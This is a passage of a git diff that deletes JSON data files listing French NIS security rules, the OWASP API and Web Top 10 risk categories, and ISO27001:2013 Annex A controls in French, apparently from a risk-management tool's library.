moyen de comptes privilégiés ; - le pourcentage de ressources dont les éléments secrets d'authentification ne peuvent pas être modifiés par l'opérateur ; - des indicateurs relatifs à l'administration des ressources : - le pourcentage de ressources administrées dont l'administration est effectuée à partir d'un compte non spécifique d'administration ; - le pourcentage de ressources administrées dont l'administration ne peut pas être effectuée au travers d'une liaison réseau physique ou d'une interface d'administration physique.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Gouvernance - Règle 5. Audits de la sécurité", - "description": "L'opérateur de services essentiels réalise, dans le cadre de l'homologation de sécurité prévue à la règle 3, un audit de la sécurité de chaque système d'information essentiel (SIE). L'audit doit aussi être réalisé lors de chaque renouvellement de l'homologation en prenant notamment en compte les résultats de la mise à jour de l'analyse de risque du SIE.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Gouvernance - Règle 6. Cartographie", - "description": "L'opérateur de services essentiels élabore et tient à jour, pour chaque système d'information essentiel (SIE), les éléments de cartographie suivants : - les noms et les fonctions des applications, supportant les activités de l'opérateur, installées sur le SIE ; - le cas échéant, les plages d'adresses IP de sortie du SIE vers internet ou un réseau tiers, ou accessibles depuis ces réseaux ; - le cas échéant, les plages d'adresses IP associées aux différents sous-réseaux composant le SIE ; - la description fonctionnelle et les lieux d'installation du SIE et de ses différents sous-réseaux ; - la description fonctionnelle des points d'interconnexion du SIE et de ses différents sous-réseaux avec des réseaux tiers, notamment la description des équipements et des fonctions de filtrage et de protection mis en œuvre au niveau de ces interconnexions ; - l'inventaire et l'architecture des dispositifs d'administration du SIE permettant de réaliser notamment les opérations d'installation à distance, de mise à jour, de supervision, de gestion des configurations, d'authentification ainsi que de gestion des comptes et des droits d'accès ; - la liste des comptes disposant de droits d'accès privilégiés au SIE (appelés « comptes privilégiés »). Cette liste précise pour chaque compte le niveau et le périmètre des droits d'accès associés, notamment les comptes sur lesquels portent ces droits (comptes d'utilisateurs, comptes de messagerie, comptes de processus, etc.) ; - l'inventaire, l'architecture et le positionnement des services de résolution de noms d'hôte, de messagerie, de relais internet et d'accès distant mis en œuvre par le SIE.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 7. Configuration", - "description": "L'opérateur de services essentiels respecte les règles suivantes lorsqu'il installe des services et des équipements sur ses systèmes d'information essentiels (SIE) : - l'opérateur installe sur ses SIE les seuls services et fonctionnalités qui sont indispensables à leur fonctionnement ou à leur sécurité. Il désactive les services et les fonctionnalités qui ne sont pas indispensables, notamment ceux installés par défaut, et les désinstalle si cela est possible. Lorsque la désinstallation n'est pas possible, l'opérateur le mentionne dans le dossier d'homologation du SIE concerné en précisant les services et fonctionnalités concernés et les mesures de réduction du risque mises en œuvre ; - l'opérateur ne connecte à ses SIE que des équipements, matériels périphériques et supports amovibles dont il assure la gestion et qui sont indispensables au fonctionnement ou à la sécurité de ses SIE ; - les supports amovibles inscriptibles connectés aux SIE sont utilisés exclusivement pour le fonctionnement, y compris la maintenance et l'administration, ou la sécurité des SIE ; - l'opérateur procède, avant chaque utilisation de supports amovibles, à l'analyse de leur contenu, notamment à la recherche de code malveillant. L'opérateur met en place, sur les équipements auxquels sont connectés ces supports amovibles, des mécanismes de protection contre les risques d'exécution de code malveillant provenant de ces supports.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 8. Cloisonnement", - "description": "L'opérateur de services essentiels procède au cloisonnement de ses systèmes d'information essentiels (SIE) afin de limiter la propagation des attaques informatiques au sein de ses systèmes ou ses sous-systèmes.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 9. Accès distant", - "description": "L'opérateur de services essentiels protège les accès à ses systèmes d'information essentiels (SIE) effectués à travers des systèmes d'information tiers. En particulier, lorsqu'un service essentiel nécessite que le SIE nécessaire à sa fourniture soit accessible via un réseau public, l'opérateur protège cet accès au moyen de mécanismes cryptographiques conformes aux règles préconisées par l'Agence nationale de la sécurité des systèmes d'information.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 10. Filtrage", - "description": "L'opérateur de services essentiels met en place des mécanismes de filtrage des flux de données circulant dans ses systèmes d'information essentiels (SIE) afin de bloquer la circulation des flux inutiles au fonctionnement de ses systèmes et susceptibles de faciliter des attaques informatiques.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 11. Comptes d'administration", - "description": "L'opérateur de services essentiels crée des comptes (appelés « comptes d'administration ») destinés aux seules personnes (appelées « administrateurs ») chargées d'effectuer les opérations d'administration (installation, configuration, gestion, maintenance, supervision, etc.) des ressources de ses systèmes d'information essentiels (SIE).", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 12. Systèmes d'information d'administration", - "description": "L'opérateur de services essentiels applique les règles suivantes aux systèmes d'information (appelés « systèmes d'information d'administration ») utilisés pour effectuer l'administration de ses systèmes d'information essentiels (SIE) : - les ressources matérielles et logicielles des systèmes d'information d'administration sont gérées et configurées par l'opérateur ou, le cas échéant, par le prestataire qu'il a mandaté pour réaliser les opérations d'administration ; - les ressources matérielles et logicielles des systèmes d'information d'administration sont utilisées exclusivement pour réaliser des opérations d'administration. Cependant, lorsque des raisons techniques ou organisationnelles le justifient, le poste de travail physique de l'administrateur peut être utilisé pour réaliser des opérations autres que des opérations d'administration. Dans ce cas, des mécanismes de durcissement du système d'exploitation du poste de travail et de cloisonnement doivent être mis en place pour permettre d'isoler l'environnement logiciel utilisé pour ces autres opérations de l'environnement logiciel utilisé pour les opérations d'administration ; - un environnement logiciel utilisé pour effectuer des opérations d'administration ne doit pas être utilisé à d'autres fins, comme l'accès à des sites ou serveurs de messagerie sur internet ; - un utilisateur ne doit pas se connecter à un système d'information d'administration au moyen d'un environnement logiciel utilisé pour d'autres fonctions que des opérations d'administration ; - les flux de données associés à des opérations autres que des opérations d'administration doivent, lorsqu'ils transitent sur les systèmes d'information d'administration, être cloisonnés au moyen de mécanismes de chiffrement et d'authentification conformes aux règles préconisées par l'Agence nationale de la sécurité des systèmes d'information ; - les systèmes d'information d'administration sont connectés aux ressources du SIE à administrer au travers d'une liaison réseau physique utilisée exclusivement pour les opérations d'administration. Ces ressources sont administrées au travers de leur interface d'administration physique. Lorsque des raisons techniques empêchent d'administrer une ressource au travers d'une liaison réseau physique ou de son interface d'administration physique, l'opérateur met en œuvre des mesures de réduction du risque telles que des mesures de sécurité logique. Dans ce cas, il décrit ces mesures et leurs justifications dans le dossier d'homologation du SIE concerné ; - lorsqu'ils ne circulent pas dans le système d'information d'administration, les flux d'administration sont protégés par des mécanismes de chiffrement et d'authentification conformes aux règles préconisées par l'Agence nationale de la sécurité des systèmes d'information. Si le chiffrement et l'authentification de ces flux ne sont pas possibles pour des raisons techniques, l'opérateur met en œuvre des mesures permettant de protéger la confidentialité et l'intégrité de ces flux et de renforcer le contrôle et la traçabilité des opérations d'administration. Dans ce cas, il décrit ces mesures et leurs justifications dans le dossier d'homologation du SIE concerné ; - les journaux enregistrant les événements générés par les ressources des systèmes d'information d'administration ne contiennent aucun mot de passe ou autre élément secret d'authentification en clair ou sous forme d'empreinte cryptographique.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 13. Identification", - "description": "L'opérateur de services essentiels crée des comptes individuels pour tous les utilisateurs (y compris les utilisateurs ayant des comptes privilégiés ou des comptes d'administration) et pour les processus automatiques accédant aux ressources de ses systèmes d'information essentiels (SIE).", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 14. Authentification", - "description": "L'opérateur de services essentiels protège les accès aux ressources de ses systèmes d'information essentiels (SIE), que ce soit par un utilisateur ou par un processus automatique, au moyen d'un mécanisme d'authentification impliquant un élément secret.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 15. Droits d'accès", - "description": "L'opérateur de services essentiels définit, conformément à sa politique de sécurité des réseaux et systèmes d'information, les règles de gestion et d'attribution des droits d'accès aux ressources de ses systèmes d'information essentiels (SIE), et respecte les règles suivantes : - l'opérateur n'attribue à un utilisateur ou à un processus automatique les droits d'accès à une ressource que si cet accès est strictement nécessaire à l'exercice des missions de l'utilisateur ou au fonctionnement du processus automatique ; - l'opérateur définit les accès aux différentes fonctionnalités de chaque ressource et en attribue les droits uniquement aux utilisateurs et aux processus automatiques qui en ont strictement le besoin ; - les droits d'accès sont révisés périodiquement, au moins tous les ans, par l'opérateur. Cette révision porte sur les liens entre les comptes, les droits d'accès associés et les ressources ou les fonctionnalités qui en font l'objet ; - l'opérateur établit et tient à jour la liste des comptes privilégiés. Toute modification d'un compte privilégié (ajout, suppression, suspension ou modification des droits associés) fait l'objet d'un contrôle formel de l'opérateur destiné à vérifier que les droits d'accès aux ressources et fonctionnalités sont attribués selon le principe du moindre privilège (seuls les droits strictement nécessaires sont accordés) et en cohérence avec les besoins d'utilisation du compte.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 16. Procédure de maintien en conditions de sécurité", - "description": "L'opérateur de services essentiels élabore, tient à jour et met en œuvre une procédure de maintien en conditions de sécurité des ressources matérielles et logicielles de ses systèmes d'information essentiels (SIE), conformément à sa politique de sécurité des réseaux et systèmes d'information. Cette procédure définit les conditions permettant de maintenir le niveau de sécurité des ressources des SIE en fonction de l'évolution des vulnérabilités et des menaces et précise notamment la politique d'installation de toute nouvelle version et mesure correctrice de sécurité d'une ressource et les vérifications à effectuer avant l'installation.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Protection - Règle 17. Sécurité physique et environnementale", - "description": "L'opérateur de services essentiels définit et met en œuvre, conformément à sa politique de sécurité des réseaux et systèmes d'information, les procédures et les mesures de sécurité physique et environnementale applicables à ses systèmes d'information essentiels (SIE). Ces procédures et mesures portent notamment sur le contrôle du personnel interne et du personnel externe, le contrôle d'accès physique aux SIE et, le cas échéant, la protection des SIE contre les risques environnementaux tels que les catastrophes naturelles.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Défense - Règle 18. Détection", - "description": "L'opérateur de services essentiels élabore, tient à jour et met en œuvre, conformément à sa politique de sécurité des réseaux et systèmes d'information, une procédure de détection des incidents de sécurité affectant ses systèmes d'information essentiels (SIE). Cette procédure prévoit des mesures organisationnelles et techniques destinées à détecter les incidents de sécurité affectant les SIE. Les mesures organisationnelles comprennent les modalités d'exploitation des dispositifs de détection et décrivent la chaîne de traitement des événements de sécurité identifiés par ces dispositifs. Les mesures techniques précisent la nature et le positionnement des dispositifs de détection. L'opérateur met en œuvre des dispositifs de détection capables d'identifier des événements caractéristiques d'un incident de sécurité notamment d'une attaque en cours ou à venir et de permettre la recherche de traces d'incidents antérieurs.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Défense - Règle 19. Journalisation", - "description": "L'opérateur de services essentiels met en œuvre sur chaque système d'information essentiel (SIE) un système de journalisation qui enregistre les événements relatifs à l'authentification des utilisateurs, à la gestion des comptes et des droits d'accès, à l'accès aux ressources, aux modifications des règles de sécurité du SIE ainsi qu'au fonctionnement du SIE. Le système de journalisation contribue à la détection d'incidents de sécurité en collectant les données de journalisation.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Défense - Règle 20. Corrélation et analyse de journaux", - "description": "L'opérateur de services essentiels met en œuvre un système de corrélation et d'analyse de journaux qui exploite les événements enregistrés par le système de journalisation installé sur chacun des systèmes d'information essentiels (SIE), afin de détecter des événements susceptibles d'affecter la sécurité des SIE. Le système de corrélation et d'analyse de journaux contribue à la détection d'incidents de sécurité en analysant les données de journalisation. Le système de corrélation et d'analyse de journaux est installé et exploité sur un système d'information mis en place exclusivement à des fins de détection d'événements susceptibles d'affecter la sécurité des systèmes d'information.", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Défense - Règle 21. Réponse aux incidents", - "description": "L'opérateur de services essentiels élabore, tient à jour et met en œuvre, conformément à sa politique de sécurité des réseaux et systèmes d'information, une procédure de traitement des incidents de sécurité affectant ses systèmes d'information essentiels (SIE).", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Défense - Règle 22. Traitement des alertes", - "description": "L'opérateur de services essentiels met en place un service lui permettant de prendre connaissance, dans les meilleurs délais, d'informations transmises par l'Agence nationale de la sécurité des systèmes d'information relatives à des incidents, des vulnérabilités et des menaces. Il met en œuvre une procédure pour traiter les informations ainsi reçues et le cas échéant prendre les mesures de sécurité nécessaires à la protection de ses systèmes d'information essentiels (SIE).", - "provider": "NIS" - } - }, - { - "type": "security_function", - "fields": { - "name": "Résilience - Règle 23. Gestion de crises", - "description": "L'opérateur de services essentiels élabore, tient à jour et met en œuvre, conformément à sa politique de sécurité des réseaux et systèmes d'information, une procédure de gestion de crises en cas d'incidents de sécurité ayant un impact majeur sur les services essentiels de l'opérateur.", - "provider": "NIS" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/OWASP top 10 API.json b/library/libraries/OWASP top 10 API.json deleted file mode 100644 index 69e9270..0000000 --- a/library/libraries/OWASP top 10 API.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "locale": "en", - "name": "OWASP top 10 API", - "description": "Top 10 API risks determined by OWASP - 2019", - "format_version": "1.0", - "copyright": "COPYRIGHT NOTICE\nOpen Web Application Security Project, OWASP, Global AppSec, AppSec Days, AppSec California, SnowFROC, LASCON, and the OWASP logo are trademarks of the OWASP Foundation. Unless otherwise specified, all content on the site is Creative Commons Attribution-ShareAlike v4.0 and provided without warranty of service or accuracy. For more information, please refer to our General Disclaimer (https://owasp.org/www-policy/operational/general-disclaimer.html). OWASP does not endorse or recommend commercial products or services, allowing our community to remain vendor neutral with the collective wisdom of the best minds in software security worldwide. Copyright 2022, OWASP Foundation, Inc.", - "objects": [ - { - "type": "threat", - "fields": { - "name": "API1:2019 Broken Object Level Authorization", - "description": "APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object level authorization checks should be considered in every function that accesses a data source using an input from the user.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API2:2019 Broken User Authentication", - "description": "Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user’s identities temporarily or permanently. Compromising a system’s ability to identify the client/user, compromises API security overall.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API3:2019 Excessive Data Exposure", - "description": "Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API4:2019 Lack of Resources & Rate Limiting", - "description": "Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API5:2019 Broken Function Level Authorization", - "description": "Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API6:2019 Mass Assignment", - "description": "Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on an allowlist, usually leads to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API7:2019 Security Misconfiguration", - "description": "Security misconfiguration is commonly a result of unsecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API8:2019 Injection", - "description": "Injection flaws, such as SQL, NoSQL, Command Injection, etc., occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API9:2019 Improper Assets Management", - "description": "APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.", - "provider": "OWASP TOP10 API" - } - }, - { - "type": "threat", - "fields": { - "name": "API10:2019 Insufficient Logging & Monitoring", - "description": "Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.", - "provider": "OWASP TOP10 API" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/OWASP top 10 web.json b/library/libraries/OWASP top 10 web.json deleted file mode 100644 index f089d6d..0000000 --- a/library/libraries/OWASP top 10 web.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "locale": "en", - "name": "OWASP top 10 Web", - "description": "Top 10 appsec risks determined by OWASP - 2021", - "format_version": "1.0", - "copyright": "COPYRIGHT NOTICE\nOpen Web Application Security Project, OWASP, Global AppSec, AppSec Days, AppSec California, SnowFROC, LASCON, and the OWASP logo are trademarks of the OWASP Foundation. Unless otherwise specified, all content on the site is Creative Commons Attribution-ShareAlike v4.0 and provided without warranty of service or accuracy. For more information, please refer to our General Disclaimer (https://owasp.org/www-policy/operational/general-disclaimer.html). OWASP does not endorse or recommend commercial products or services, allowing our community to remain vendor neutral with the collective wisdom of the best minds in software security worldwide. Copyright 2022, OWASP Foundation, Inc.", - "objects": [ - { - "type": "threat", - "fields": { - "name": "A01 Broken Access Control", - "description": "Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification, or destruction of all data or performing a business function outside the user's limits.", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A02 Cryptographic Failures", - "description": "The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, personal information, and business secrets require extra protection, mainly if that data falls under privacy laws, e.g., EU's General Data Protection Regulation (GDPR), or regulations, e.g., financial data protection such as PCI Data Security Standard (PCI DSS).", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A03 Injection", - "description": "An application is vulnerable to attack when: User-supplied data is not validated, filtered, or sanitized by the application / Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter / Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records / Hostile data is directly used or concatenated. The SQL or command contains the structure and malicious data in dynamic queries, commands, or stored procedures.", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A04 Insecure Design", - "description": "Insecure design is a broad category representing different weaknesses, expressed as missing or ineffective control design.", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A05 Security Misconfiguration", - "description": "The application might be vulnerable if the application is: Missing appropriate security hardening across any part of the application stack or improperly configured permissions on cloud services. / Unnecessary features are enabled or installed (e.g., unnecessary ports, services, pages, accounts, or privileges). / Default accounts and their passwords are still enabled and unchanged. / Error handling reveals stack traces or other overly informative error messages to users. / For upgraded systems, the latest security features are disabled or not configured securely. / The security settings in the application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc., are not set to secure values. / The server does not send security headers or directives, or they are not set to secure values. / The software is out of date or vulnerable", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A06 Vulnerable and Outdated Components", - "description": "You are likely vulnerable: If you do not know the versions of all components you use (both client-side and server-side). This includes components you directly use as well as nested dependencies. / If the software is vulnerable, unsupported, or out of date. This includes the OS, web/application server, database management system (DBMS), applications, APIs and all components, runtime environments, and libraries. / If you do not scan for vulnerabilities regularly and subscribe to security bulletins related to the components you use. / If you do not fix or upgrade the underlying platform, frameworks, and dependencies in a risk-based, timely fashion. This commonly happens in environments when patching is a monthly or quarterly task under change control, leaving organizations open to days or months of unnecessary exposure to fixed vulnerabilities. / If software developers do not test the compatibility of updated, upgraded, or patched libraries. / If you do not secure the components’ configurations", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A07 Identification and Authentication Failures", - "description": "Confirmation of the user's identity, authentication, and session management is critical to protect against authentication-related attacks.", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A08 Software and Data Integrity Failures", - "description": "Software and data integrity failures relate to code and infrastructure that does not protect against integrity violations. An example of this is where an application relies upon plugins, libraries, or modules from untrusted sources, repositories, and content delivery networks (CDNs). An insecure CI/CD pipeline can introduce the potential for unauthorized access, malicious code, or system compromise. Lastly, many applications now include auto-update functionality, where updates are downloaded without sufficient integrity verification and applied to the previously trusted application. Attackers could potentially upload their own updates to be distributed and run on all installations. Another example is where objects or data are encoded or serialized into a structure that an attacker can see and modify is vulnerable to insecure deserialization.", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A09 Security Logging and Monitoring Failures ", - "description": "Returning to the OWASP Top 10 2021, this category is to help detect, escalate, and respond to active breaches. Without logging and monitoring, breaches cannot be detected.", - "provider": "OWASP TOP10 WEB" - } - }, - { - "type": "threat", - "fields": { - "name": "A10 Server Side Request Forgery (SSRF) ", - "description": "SSRF flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or another type of network access control list (ACL). As modern web applications provide end-users with convenient features, fetching a URL becomes a common scenario. As a result, the incidence of SSRF is increasing. Also, the severity of SSRF is becoming higher due to cloud services and the complexity of architectures.", - "provider": "OWASP TOP10 WEB" - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/iso27001-fr.json b/library/libraries/iso27001-fr.json deleted file mode 100644 index 8e4f976..0000000 --- a/library/libraries/iso27001-fr.json +++ /dev/null @@ -1,920 +0,0 @@ -{ - "name": "ISO27001:2013 - Annexe A", - "description": "Fonctions de s\u00e9curit\u00e9 depuis l'annexe A de l'ISO27001:2013", - "copyright": "\u00a9ISO/CEI 2013 \u2013 All rights reserved", - "locale": "fr", - "objects": [ - { - "type": "security_function", - "fields": { - "name": "\ufeffA.5.1.1 - Politiques de s\u00e9curit\u00e9 de l\u2019information", - "description": "Un ensemble de politiques de s\u00e9curit\u00e9 de l\u2019information doit \u00eatre d\u00e9fini, approuv\u00e9 par la direction, diffus\u00e9 et communiqu\u00e9 aux salari\u00e9s et aux tiers concern\u00e9s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.5.1.2 - Revue des politiques de s\u00e9curit\u00e9 de l\u2019information", - "description": "Les politiques de s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre revues \u00e0 intervalles programm\u00e9s ou en cas de changements majeurs pour garantir leur pertinence, leur ad\u00e9quation et leur effectivit\u00e9 dans le temps.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.1 - Fonctions et responsabilit\u00e9s li\u00e9es \u00e0 la s\u00e9curit\u00e9 de l\u2019information", - "description": "Toutes les responsabilit\u00e9s en mati\u00e8re de s\u00e9curit\u00e9 de l\u2019information doivent \u00eatre d\u00e9finies et attribu\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.2 - S\u00e9paration des t\u00e2ches", - "description": "Les t\u00e2ches et les domaines de responsabilit\u00e9 incompatibles doivent \u00eatre cloisonn\u00e9s pour limiter les possibilit\u00e9s de modification ou de mauvais usage, non autoris\u00e9(e) ou involontaire, des actifs de l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.3 - Relations avec les autorit\u00e9s", - "description": "Des relations appropri\u00e9es avec les autorit\u00e9s comp\u00e9tentes doivent \u00eatre entretenues.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.4 - Relations avec des groupes de travail sp\u00e9cialis\u00e9s", - "description": "Des relations appropri\u00e9es avec des groupes d\u2019int\u00e9r\u00eat, des forums sp\u00e9cialis\u00e9s dans la s\u00e9curit\u00e9 et des associations professionnelles doivent \u00eatre entretenues.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.1.5 - La s\u00e9curit\u00e9 de l\u2019information dans la gestion de projet", - "description": "La s\u00e9curit\u00e9 de l\u2019information doit \u00eatre consid\u00e9r\u00e9e dans la gestion de projet, quel que soit le type de projet concern\u00e9.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.2.1 - Politique en mati\u00e8re d\u2019appareils mobiles", - "description": "Une politique et des mesures de s\u00e9curit\u00e9 compl\u00e9mentaires doivent \u00eatre adopt\u00e9es pour g\u00e9rer les risques d\u00e9coulant de l\u2019utilisation des appareils mobiles.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.6.2.2 - T\u00e9l\u00e9travail", - "description": "Une politique et des mesures de s\u00e9curit\u00e9 compl\u00e9mentaires doivent \u00eatre mises en \u0153uvre pour prot\u00e9ger les informations consult\u00e9es, trait\u00e9es ou stock\u00e9es sur des sites de t\u00e9l\u00e9travail.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.1.1 - S\u00e9lection des candidats", - "description": "Des v\u00e9rifications doivent \u00eatre effectu\u00e9es sur tous les candidats \u00e0 l\u2019embauche conform\u00e9ment aux lois, aux r\u00e8glements et \u00e0 l\u2019\u00e9thique et \u00eatre proportionn\u00e9es aux exigences m\u00e9tier, \u00e0 la classification des informations accessibles et aux risques identifi\u00e9s.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.1.2 - Termes et conditions d\u2019embauche", - "description": "Les accords contractuels entre les salari\u00e9s et les sous-traitants doivent pr\u00e9ciser leurs responsabilit\u00e9s et celles de l\u2019organisation en mati\u00e8re de s\u00e9curit\u00e9 de l\u2019information.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.2.1 - Responsabilit\u00e9s de la direction", - "description": "La direction doit demander \u00e0 tous les salari\u00e9s et sous-traitants d\u2019appliquer les r\u00e8gles de s\u00e9curit\u00e9 de l\u2019information conform\u00e9ment aux politiques et aux proc\u00e9dures en vigueur dans l\u2019organisation.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.2.2 - Sensibilisation, apprentissage et formation \u00e0 la s\u00e9curit\u00e9 de l\u2019information", - "description": "L\u2019ensemble des salari\u00e9s de l\u2019organisation et, quand cela est pertinent, des sous-traitants, doit b\u00e9n\u00e9ficier d\u2019une sensibilisation et de formations adapt\u00e9es et recevoir r\u00e9guli\u00e8rement les mises \u00e0 jour des politiques et proc\u00e9dures de l\u2019organisation s\u2019appliquant \u00e0 leurs fonctions.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.2.3 - Processus disciplinaire", - "description": "Un processus disciplinaire formel et connu de tous doit exister pour prendre des mesures \u00e0 l\u2019encontre des salari\u00e9s ayant enfreint les r\u00e8gles li\u00e9es \u00e0 la s\u00e9curit\u00e9 de l\u2019information.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.7.3.1 - Ach\u00e8vement ou modification des responsabilit\u00e9s associ\u00e9es au contrat de travail", - "description": "Les responsabilit\u00e9s et les missions li\u00e9es \u00e0 la s\u00e9curit\u00e9 de l\u2019information qui restent valables \u00e0 l\u2019issue de la rupture, du terme ou de la modification du contrat de travail, doivent \u00eatre d\u00e9finies, communiqu\u00e9es au salari\u00e9 ou au sous-traitant, et appliqu\u00e9es.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.1 - Inventaire des actifs", - "description": "Les actifs associ\u00e9s \u00e0 l\u2019information et aux moyens de traitement de l\u2019information doivent \u00eatre identifi\u00e9s et un inventaire de ces actifs doit \u00eatre dress\u00e9 et tenu \u00e0 jour.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.2 - Propri\u00e9t\u00e9 des actifs", - "description": "Les actifs figurant \u00e0 l\u2019inventaire doivent \u00eatre attribu\u00e9s \u00e0 un propri\u00e9taire.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.3 - Utilisation correcte des actifs", - "description": "Les r\u00e8gles d\u2019utilisation correcte de l\u2019information, les actifs associ\u00e9s \u00e0 l\u2019information et les moyens de traitement de l\u2019information doivent \u00eatre identifi\u00e9s, document\u00e9s et mis en \u0153uvre.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.1.4 - Restitution des actifs", - "description": "Tous les salari\u00e9s et les utilisateurs tiers doivent restituer la totalit\u00e9 des actifs de l\u2019organisation qu\u2019ils ont en leur possession au terme de la p\u00e9riode d\u2019emploi, du contrat ou de l\u2019accord.\n", - "provider": "ISO 27001:2013" - } - }, - { - "type": "security_function", - "fields": { - "name": "A.8.2.1 - Classification des informations", - "description": "Les informations doivent \u00eatre classifi\u00e9es en termes d\u2019exigences 